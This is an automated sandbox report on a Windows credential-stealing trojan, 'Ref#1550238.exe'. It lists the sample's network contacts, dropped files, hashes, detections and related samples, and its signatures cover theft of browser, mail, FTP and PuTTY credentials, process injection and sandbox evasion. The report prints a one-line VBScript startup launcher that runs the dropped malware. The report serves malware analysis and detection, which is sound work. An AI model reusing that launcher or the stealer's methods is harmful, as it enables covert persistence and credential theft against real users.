                      System Network Configuration Discovery
                      Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1567423 Sample: Ref#1550238.exe Startdate: 03/12/2024 Architecture: WINDOWS Score: 100 30 oshi.at 2->30 32 api.ipify.org 2->32 54 Suricata IDS alerts for network traffic 2->54 56 Found malware configuration 2->56 58 Malicious sample detected (through community Yara rule) 2->58 60 9 other signatures 2->60 8 Ref#1550238.exe 15 5 2->8         started        13 wscript.exe 1 2->13         started        signatures3 process4 dnsIp5 34 oshi.at 194.15.112.248, 443, 49710, 49714 INTERNATIONAL-HOSTING-SOLUTIONS-ASEUDCrouteGB Ukraine 8->34 24 C:\Users\user\AppData\Roaming\vdvfyt.exe, PE32 8->24 dropped 26 C:\Users\user\...\vdvfyt.exe:Zone.Identifier, ASCII 8->26 dropped 28 C:\Users\user\AppData\Roaming\...\vdvfyt.vbs, ASCII 8->28 dropped 70 Drops VBS files to the startup folder 8->70 72 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 8->72 74 Writes to foreign memory regions 8->74 76 Injects a PE file into a foreign processes 8->76 15 InstallUtil.exe 14 2 8->15         started        78 Windows Scripting host queries suspicious COM object (likely to drop second stage) 13->78 19 vdvfyt.exe 14 2 13->19         started        file6 signatures7 process8 dnsIp9 36 162.254.34.31, 49713, 49720, 587 VIVIDHOSTINGUS United States 15->36 38 api.ipify.org 104.26.13.205, 443, 49712, 49719 CLOUDFLARENETUS United States 15->38 40 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 15->40 42 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 15->42 44 Tries to steal Mail credentials (via file / registry access) 15->44 46 Multi AV Scanner detection for dropped file 19->46 48 Machine Learning detection for dropped file 19->48 50 Writes to foreign memory regions 19->50 52 Injects a PE file into a foreign processes 19->52 21 InstallUtil.exe 2 19->21         started        signatures10 process11 signatures12 62 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 21->62 64 Tries to steal Mail credentials (via file / registry access) 21->64 66 Tries to harvest and steal ftp login credentials 21->66 68 Tries to harvest and steal browser information (history, passwords, etc) 21->68

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      SourceDetectionScannerLabelLink
                      Ref#1550238.exe45%ReversingLabsWin32.Trojan.Generic
                      Ref#1550238.exe100%Joe Sandbox ML
                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Roaming\vdvfyt.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Roaming\vdvfyt.exe45%ReversingLabsWin32.Trojan.Generic
                      No Antivirus matches
                      No Antivirus matches
                      SourceDetectionScannerLabelLink
                      https://oshi.at0%Avira URL Cloudsafe
                      https://oshi.at/EqqP0%Avira URL Cloudsafe
                      NameIPActiveMaliciousAntivirus DetectionReputation
                      oshi.at
                      194.15.112.248
                      truefalse
                        unknown
                        api.ipify.org
                        104.26.13.205
                        truefalse
                          high
                          NameMaliciousAntivirus DetectionReputation
                          https://api.ipify.org/false
                            high
                            https://oshi.at/EqqPfalse
                            • Avira URL Cloud: safe
                            unknown
                            NameSourceMaliciousAntivirus DetectionReputation
                            https://stackoverflow.com/q/14436606/23354Ref#1550238.exe, 00000000.00000002.2523426646.0000000003921000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.2523426646.00000000036A1000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.2509223302.000000000274F000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.2528520162.0000000006B20000.00000004.08000000.00040000.00000000.sdmp, vdvfyt.exe, 00000005.00000002.2832313875.000000000248F000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://account.dyn.com/Ref#1550238.exe, 00000000.00000002.2523426646.0000000003AAF000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.2523426646.00000000039F5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.2736523204.0000000000402000.00000040.00000400.00020000.00000000.sdmp, vdvfyt.exe, 00000005.00000002.2847393725.0000000003774000.00000004.00000800.00020000.00000000.sdmp, vdvfyt.exe, 00000005.00000002.2847393725.0000000003862000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://github.com/mgravell/protobuf-netJRef#1550238.exe, 00000000.00000002.2523426646.0000000003921000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.2523426646.00000000036A1000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.2528520162.0000000006B20000.00000004.08000000.00040000.00000000.sdmp, vdvfyt.exe, 00000005.00000002.2847393725.00000000036A7000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://ocsps.ssl.com0?Ref#1550238.exe, vdvfyt.exe.0.drfalse
                                    high
                                    http://www.ssl.com/repository/SSLcomRootCertificationAuthorityRSA.crt0Ref#1550238.exe, vdvfyt.exe.0.drfalse
                                      high
                                      https://github.com/mgravell/protobuf-netRef#1550238.exe, 00000000.00000002.2523426646.0000000003921000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.2523426646.00000000036A1000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.2528520162.0000000006B20000.00000004.08000000.00040000.00000000.sdmpfalse
                                        high
                                        https://oshi.atRef#1550238.exe, 00000000.00000002.2509223302.00000000026A1000.00000004.00000800.00020000.00000000.sdmp, vdvfyt.exe, 00000005.00000002.2832313875.00000000023E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://cert.ssl.com/SSL.com-timeStamping-I-RSA-R1.cer0QRef#1550238.exe, vdvfyt.exe.0.drfalse
                                          high
                                          http://ocsps.ssl.com0Ref#1550238.exe, vdvfyt.exe.0.drfalse
                                            high
                                            http://cert.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.cer0Ref#1550238.exe, vdvfyt.exe.0.drfalse
                                              high
                                              http://crls.ssl.com/SSLcom-RootCA-EV-RSA-4096-R2.crl0Ref#1550238.exe, vdvfyt.exe.0.drfalse
                                                high
                                                https://api.ipify.org/tInstallUtil.exe, 00000003.00000002.2737945832.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3369187394.0000000002C1C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://crls.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.crl0Ref#1550238.exe, vdvfyt.exe.0.drfalse
                                                    high
                                                    https://api.ipify.orgRef#1550238.exe, 00000000.00000002.2523426646.0000000003AAF000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.2523426646.00000000039F5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.2737945832.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.2736523204.0000000000402000.00000040.00000400.00020000.00000000.sdmp, vdvfyt.exe, 00000005.00000002.2847393725.0000000003774000.00000004.00000800.00020000.00000000.sdmp, vdvfyt.exe, 00000005.00000002.2847393725.0000000003862000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3369187394.0000000002C1C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://crls.ssl.com/ssl.com-rsa-RootCA.crl0Ref#1550238.exe, vdvfyt.exe.0.drfalse
                                                        high
                                                        https://github.com/mgravell/protobuf-netiRef#1550238.exe, 00000000.00000002.2523426646.0000000003921000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.2523426646.00000000036A1000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.2528520162.0000000006B20000.00000004.08000000.00040000.00000000.sdmpfalse
                                                          high
                                                          http://crls.ssl.com/SSL.com-timeStamping-I-RSA-R1.crl0Ref#1550238.exe, vdvfyt.exe.0.drfalse
                                                            high
                                                            https://stackoverflow.com/q/11564914/23354;Ref#1550238.exe, 00000000.00000002.2523426646.0000000003921000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.2523426646.00000000036A1000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.2528520162.0000000006B20000.00000004.08000000.00040000.00000000.sdmpfalse
                                                              high
                                                              https://stackoverflow.com/q/2152978/23354Ref#1550238.exe, 00000000.00000002.2523426646.0000000003921000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.2523426646.00000000036A1000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.2528520162.0000000006B20000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                high
                                                                https://www.ssl.com/repository0Ref#1550238.exe, vdvfyt.exe.0.drfalse
                                                                  high
                                                                  http://ocsps.ssl.com0_Ref#1550238.exe, vdvfyt.exe.0.drfalse
                                                                    high
                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRef#1550238.exe, 00000000.00000002.2509223302.00000000026A1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.2737945832.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, vdvfyt.exe, 00000005.00000002.2832313875.00000000023E1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3369187394.0000000002C1C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://www.ssl.com/repository/SSLcom-RootCA-EV-RSA-4096-R2.crt0Ref#1550238.exe, vdvfyt.exe.0.drfalse
                                                                        high
                                                                        • No. of IPs < 25%
                                                                        • 25% < No. of IPs < 50%
                                                                        • 50% < No. of IPs < 75%
                                                                        • 75% < No. of IPs
                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                        194.15.112.248
                                                                        oshi.atUkraine
                                                                        213354INTERNATIONAL-HOSTING-SOLUTIONS-ASEUDCrouteGBfalse
                                                                        104.26.13.205
                                                                        api.ipify.orgUnited States
                                                                        13335CLOUDFLARENETUSfalse
                                                                        162.254.34.31
                                                                        unknownUnited States
                                                                        64200VIVIDHOSTINGUStrue
                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                        Analysis ID:1567423
                                                                        Start date and time:2024-12-03 15:14:38 +01:00
                                                                        Joe Sandbox product:CloudBasic
                                                                        Overall analysis duration:0h 9m 17s
                                                                        Hypervisor based Inspection enabled:false
                                                                        Report type:full
                                                                        Cookbook file name:default.jbs
                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                        Run name:Run with higher sleep bypass
                                                                        Number of analysed new started processes analysed:10
                                                                        Number of new started drivers analysed:0
                                                                        Number of existing processes analysed:0
                                                                        Number of existing drivers analysed:0
                                                                        Number of injected processes analysed:0
                                                                        Technologies:
                                                                        • HCA enabled
                                                                        • EGA enabled
                                                                        • AMSI enabled
                                                                        Analysis Mode:default
                                                                        Analysis stop reason:Timeout
                                                                        Sample name:Ref#1550238.exe
                                                                        Detection:MAL
                                                                        Classification:mal100.troj.spyw.expl.evad.winEXE@8/3@2/3
                                                                        EGA Information:
                                                                        • Successful, ratio: 100%
                                                                        HCA Information:
                                                                        • Successful, ratio: 90%
                                                                        • Number of executed functions: 426
                                                                        • Number of non-executed functions: 35
                                                                        Cookbook Comments:
                                                                        • Found application associated with file extension: .exe
                                                                        • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                                        • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ocsps.ssl.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                        • VT rate limit hit for: Ref#1550238.exe
                                                                        TimeTypeDescription
                                                                        15:16:05AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vdvfyt.vbs
                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        194.15.112.248KyrazonSetup.exeGet hashmaliciousUnknownBrowse
                                                                          KyrazonSetup.exeGet hashmaliciousUnknownBrowse
                                                                            Order._1.exeGet hashmaliciousAsyncRAT, Babadeda, PureLog Stealer, zgRATBrowse
                                                                              uVQLD8YVk6.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, Petite Virus, RHADAMANTHYS, RedLine, SmokeLoaderBrowse
                                                                                W73PCbSH71.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, Petite Virus, RHADAMANTHYS, RedLine, SmokeLoaderBrowse
                                                                                  104.26.13.2052b7cu0KwZl.exeGet hashmaliciousUnknownBrowse
                                                                                  • api.ipify.org/
                                                                                  file.exeGet hashmaliciousUnknownBrowse
                                                                                  • api.ipify.org/
                                                                                  file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                  • api.ipify.org/
                                                                                  file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                  • api.ipify.org/
                                                                                  file.exeGet hashmaliciousRDPWrap ToolBrowse
                                                                                  • api.ipify.org/
                                                                                  Prismifyr-Install.exeGet hashmaliciousNode StealerBrowse
                                                                                  • api.ipify.org/
                                                                                  file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                  • api.ipify.org/
                                                                                  file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                                                                  • api.ipify.org/
                                                                                  file.exeGet hashmaliciousUnknownBrowse
                                                                                  • api.ipify.org/
                                                                                  file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, Stealc, VidarBrowse
                                                                                  • api.ipify.org/
                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  oshi.atSwift Payment MT103.lnkGet hashmaliciousUnknownBrowse
                                                                                  • 188.241.120.6
                                                                                  Facturation.exeGet hashmaliciousDoeneriumBrowse
                                                                                  • 188.241.120.6
                                                                                  Facturation.exeGet hashmaliciousDoeneriumBrowse
                                                                                  • 188.241.120.6
                                                                                  KyrazonSetup.exeGet hashmaliciousUnknownBrowse
                                                                                  • 194.15.112.248
                                                                                  KyrazonSetup.exeGet hashmaliciousUnknownBrowse
                                                                                  • 194.15.112.248
                                                                                  JuneOrder.exeGet hashmaliciousAsyncRAT, Babadeda, PureLog Stealer, zgRATBrowse
                                                                                  • 5.253.86.15
                                                                                  Order._1.exeGet hashmaliciousAsyncRAT, Babadeda, PureLog Stealer, zgRATBrowse
                                                                                  • 194.15.112.248
                                                                                  jdconstructnOrderfdp..exeGet hashmaliciousBabadeda, PureLog Stealer, Quasar, zgRATBrowse
                                                                                  • 188.241.120.6
                                                                                  TamenuV11.msiGet hashmaliciousUnknownBrowse
                                                                                  • 5.253.86.15
                                                                                  api.ipify.orgBuMdSP88Ze.exeGet hashmaliciousAgentTeslaBrowse
                                                                                  • 104.26.13.205
                                                                                  SANTANDER%20AUDITORIA.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                                                  • 104.26.13.205
                                                                                  main.exeGet hashmaliciousUnknownBrowse
                                                                                  • 172.67.74.152
                                                                                  https://dsiete.co/share.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                  • 104.26.13.205
                                                                                  Content Collaboration Terms.dll.exeGet hashmaliciousLummaC StealerBrowse
                                                                                  • 172.67.74.152
                                                                                  https://apnasofa.com/episode/index#YmVuQG1pY3Jvc29mdC5jb20==Get hashmaliciousUnknownBrowse
                                                                                  • 104.26.13.205
                                                                                  Employee_Important_Message.pdfGet hashmaliciousUnknownBrowse
                                                                                  • 104.26.12.205
                                                                                  l6F8Xgr0Ov.exeGet hashmaliciousAgentTeslaBrowse
                                                                                  • 104.26.12.205
                                                                                  SPlVyHiGOz.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                                                                  • 172.67.74.152
                                                                                  55qIbHIAZi.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                                                                  • 172.67.74.152
                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  INTERNATIONAL-HOSTING-SOLUTIONS-ASEUDCrouteGBKyrazonSetup.exeGet hashmaliciousUnknownBrowse
                                                                                  • 194.15.112.248
                                                                                  KyrazonSetup.exeGet hashmaliciousUnknownBrowse
                                                                                  • 194.15.112.248
                                                                                  Order._1.exeGet hashmaliciousAsyncRAT, Babadeda, PureLog Stealer, zgRATBrowse
                                                                                  • 194.15.112.248
                                                                                  uVQLD8YVk6.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, Petite Virus, RHADAMANTHYS, RedLine, SmokeLoaderBrowse
                                                                                  • 194.15.112.248
                                                                                  W73PCbSH71.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, Petite Virus, RHADAMANTHYS, RedLine, SmokeLoaderBrowse
                                                                                  • 194.15.112.248
                                                                                  1pXdiCesZ6.exeGet hashmaliciousDanaBotBrowse
                                                                                  • 194.15.112.203
                                                                                  bad.pdf.exeGet hashmaliciousUnknownBrowse
                                                                                  • 194.15.113.200
                                                                                  FromRussiaWithLove.ps1Get hashmaliciousUnknownBrowse
                                                                                  • 194.15.112.70
                                                                                  x.exeGet hashmaliciousUnknownBrowse
                                                                                  • 194.15.113.210
                                                                                  b69SScPQRV.dllGet hashmaliciousBazaLoaderBrowse
                                                                                  • 194.15.113.155
                                                                                  CLOUDFLARENETUSuC8FY7Hvsx.xlsGet hashmaliciousUnknownBrowse
                                                                                  • 188.114.96.6
                                                                                  BuMdSP88Ze.exeGet hashmaliciousAgentTeslaBrowse
                                                                                  • 104.26.13.205
                                                                                  uC8FY7Hvsx.xlsGet hashmaliciousUnknownBrowse
                                                                                  • 172.67.194.230
                                                                                  SANTANDER%20AUDITORIA.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                                                  • 104.26.13.205
                                                                                  uC8FY7Hvsx.xlsGet hashmaliciousUnknownBrowse
                                                                                  • 188.114.97.6
                                                                                  2112024_RS_GIBANJ -SWIFT.docx.docGet hashmaliciousUnknownBrowse
                                                                                  • 172.67.194.230
                                                                                  Pp7OXMFwqhXKx5Y.exeGet hashmaliciousFormBookBrowse
                                                                                  • 172.67.201.49
                                                                                  2112024_RS_GIBANJ -SWIFT.docx.docGet hashmaliciousUnknownBrowse
                                                                                  • 188.114.97.6
                                                                                  New Purchase Order.rtfGet hashmaliciousUnknownBrowse
                                                                                  • 188.114.96.9
                                                                                  https://swacargo-onlinebooking.hangara.com/reset-password/?token=039295fa7b5c57036e17d5c333688b1e5807c54f2312e5961baa1794Get hashmaliciousUnknownBrowse
                                                                                  • 1.1.1.1
                                                                                  VIVIDHOSTINGUSDJ5PhUwOsM.exeGet hashmaliciousAgentTesla, XWormBrowse
                                                                                  • 162.254.34.31
                                                                                  Ref#2056119.exeGet hashmaliciousAgentTesla, XWormBrowse
                                                                                  • 162.254.34.31
                                                                                  sh4.elfGet hashmaliciousMiraiBrowse
                                                                                  • 192.26.155.193
                                                                                  Ref#501032.vbeGet hashmaliciousMassLogger RATBrowse
                                                                                  • 162.254.34.31
                                                                                  Ref#150062.vbeGet hashmaliciousMassLogger RATBrowse
                                                                                  • 162.254.34.31
                                                                                  BankInformation.vbeGet hashmaliciousAgentTeslaBrowse
                                                                                  • 162.254.34.31
                                                                                  Booking_0731520.vbeGet hashmaliciousAgentTeslaBrowse
                                                                                  • 162.254.34.31
                                                                                  SWIFTCOPY202973783.vbeGet hashmaliciousAgentTeslaBrowse
                                                                                  • 162.254.34.31
                                                                                  D6yz87XjgM.exeGet hashmaliciousAgentTeslaBrowse
                                                                                  • 162.254.34.31
                                                                                  m68k.elfGet hashmaliciousUnknownBrowse
                                                                                  • 64.190.116.37
                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  3b5074b1b5d032e5620f69f9f700ff0eBuMdSP88Ze.exeGet hashmaliciousAgentTeslaBrowse
                                                                                  • 194.15.112.248
                                                                                  • 104.26.13.205
                                                                                  RFQ 9-XTC-204-60THD.xlsx.exeGet hashmaliciousQuasarBrowse
                                                                                  • 194.15.112.248
                                                                                  • 104.26.13.205
                                                                                  SANTANDER%20AUDITORIA.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                                                  • 194.15.112.248
                                                                                  • 104.26.13.205
                                                                                  Bestellung - 021224 - 901003637.exeGet hashmaliciousQuasarBrowse
                                                                                  • 194.15.112.248
                                                                                  • 104.26.13.205
                                                                                  Teklif Talebi- #U0130hale 14990_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  • 194.15.112.248
                                                                                  • 104.26.13.205
                                                                                  NEW90FL0OtSHAz.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  • 194.15.112.248
                                                                                  • 104.26.13.205
                                                                                  1099833039444.pdf.jsGet hashmaliciousRemcosBrowse
                                                                                  • 194.15.112.248
                                                                                  • 104.26.13.205
                                                                                  https://nam05.safelinks.protection.outlook.com.url.atp-redirect.protected-forms.com/XTnQrajg1OGVHZkdSZC9jY09NbW40Z2plNHVuWDhsQVZRZkFYNVBxOWlTekFXSXBLSVRWLyt2WXhuS1hGNVo3UUxGQTRLRVpXNHpLSjVKdDEvbHJLSmtFWjMzbFIxb3IvR2xvdWJ1em5yeTJBK1FXdzF3UG52YXBaVmJBSEJZcXBSdjFvMTh6TmplRHV4azZ6UHkrTnM5dUY2QmVzbVFVRWk5di9PMEZxZ2lXNnM5N2tuOExqN1pyUy0tcEx5Q0xXTTBEOURyNFdnTS0tTTJJM3JGT2w2ZzQxTnorb2NMd1lrZz09?cid=2305347406Get hashmaliciousKnowBe4Browse
                                                                                  • 194.15.112.248
                                                                                  • 104.26.13.205
                                                                                  No context
                                                                                  Process:C:\Users\user\Desktop\Ref#1550238.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):82
                                                                                  Entropy (8bit):4.837683827995026
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:FER/n0eFHHoCHyg4EaKC5NkOAHn:FER/lFHICHhJaZ5WOO
                                                                                  MD5:75347042FAF5747C5D43C6EEFB5A0EDE
                                                                                  SHA1:634DE057D532E9415BC2725E8DDAD3EB52A89A52
                                                                                  SHA-256:34768B3DE4D449EAB177EB76AB2C1758BC7CAECCAC5D3B2D0DC9633656864A51
                                                                                  SHA-512:68BCE78465D6CC30F8BB6761B2198AD3F047C5918DBE80489269C1E62F83D28B06CB8A33B35D7C89D207F6FCF7133ED9F7CE1A4B23413C6FEB2255352EC15206
                                                                                  Malicious:true
                                                                                  Reputation:low
                                                                                  Preview:CreateObject("WScript.Shell").Run """C:\Users\user\AppData\Roaming\vdvfyt.exe"""
                                                                                  Process:C:\Users\user\Desktop\Ref#1550238.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):348128
                                                                                  Entropy (8bit):5.691852920088672
                                                                                  Encrypted:false
                                                                                  SSDEEP:3072:BbS0IEhKUQfHCj32o7wewfHHQoz5f8o/8Ck0cTIHXrrCbJSZ862M:9SYIWtw4W8y8cc03rObgSM
                                                                                  MD5:A31BCF203BB60F13DE83211AC9D44D06
                                                                                  SHA1:8D559C68B94F38E6886F467080CBCE53A2AE1654
                                                                                  SHA-256:BD35A1C3B410026617E27FA3937F77F1A42ADA6978AFC36022E75C63677F897D
                                                                                  SHA-512:6404465CCF7DCBC3BCD985E68034F5C8CBC926DB719397D05B3AF50F9E5554CB1757080038EA7D26B451AED8C90F7D83894C1984995FFF6F87BC077AD56A3B50
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                  • Antivirus: ReversingLabs, Detection: 45%
                                                                                  Reputation:low
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....-Ng.............................=... ...@....@.. ....................................`..................................=..K....@..(............2.......`....................................................... ............... ..H............text........ ...................... ..`.rsrc...(....@....... ..............@..@.reloc.......`.......0..............@..B.................=......H.......0G..........8....................................................*...(....*..0..?..........(.... ....~....{....9....& ....8....8........E........8....*..0...........(x....(.... ....~....{....9....& ....8....8........E........9...8.....o....~....(....9/... ....~....{....9....& ....8.... ....(....s....z*..0............o....(.....(.... ....8....8........E........J.......8.... ....(....s....z*.o....~....(....:.... ....~....{....:....& ....8....8.... ....~....{....:....& .
                                                                                  Process:C:\Users\user\Desktop\Ref#1550238.exe
                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                  Category:modified
                                                                                  Size (bytes):26
                                                                                  Entropy (8bit):3.95006375643621
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:ggPYV:rPYV
                                                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                  Malicious:true
                                                                                  Reputation:high, very likely benign file
                                                                                  Preview:[ZoneTransfer]....ZoneId=0
                                                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Entropy (8bit):5.691852920088672
                                                                                  TrID:
                                                                                  • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                  • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                  • DOS Executable Generic (2002/1) 0.01%
                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                  File name:Ref#1550238.exe
                                                                                  File size:348'128 bytes
                                                                                  MD5:a31bcf203bb60f13de83211ac9d44d06
                                                                                  SHA1:8d559c68b94f38e6886f467080cbce53a2ae1654
                                                                                  SHA256:bd35a1c3b410026617e27fa3937f77f1a42ada6978afc36022e75c63677f897d
                                                                                  SHA512:6404465ccf7dcbc3bcd985e68034f5c8cbc926db719397d05b3af50f9e5554cb1757080038ea7d26b451aed8c90f7d83894c1984995fff6f87bc077ad56a3b50
                                                                                  SSDEEP:3072:BbS0IEhKUQfHCj32o7wewfHHQoz5f8o/8Ck0cTIHXrrCbJSZ862M:9SYIWtw4W8y8cc03rObgSM
                                                                                  TLSH:F174840BF7C1D4D6DD407BB2F4974911A3A0EDC23A9FCE06295633D82D733A7698618A
                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....-Ng.............................=... ...@....@.. ....................................`................................
                                                                                  Icon Hash:b04a484c4c4a4eb0
                                                                                  Entrypoint:0x443dee
                                                                                  Entrypoint Section:.text
                                                                                  Digitally signed:true
                                                                                  Imagebase:0x400000
                                                                                  Subsystem:windows gui
                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                  DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                  Time Stamp:0x674E2DDC [Mon Dec 2 21:59:56 2024 UTC]
                                                                                  TLS Callbacks:
                                                                                  CLR (.Net) Version:
                                                                                  OS Version Major:4
                                                                                  OS Version Minor:0
                                                                                  File Version Major:4
                                                                                  File Version Minor:0
                                                                                  Subsystem Version Major:4
                                                                                  Subsystem Version Minor:0
                                                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                  Signature Valid:false
                                                                                  Signature Issuer:CN=SSL.com EV Code Signing Intermediate CA RSA R3, O=SSL Corp, L=Houston, S=Texas, C=US
                                                                                  Signature Validation Error:The digital signature of the object did not verify
                                                                                  Error Number:-2146869232
                                                                                  Not Before, Not After
                                                                                  • 04/07/2024 00:35:32 15/05/2027 11:15:04
                                                                                  Subject Chain
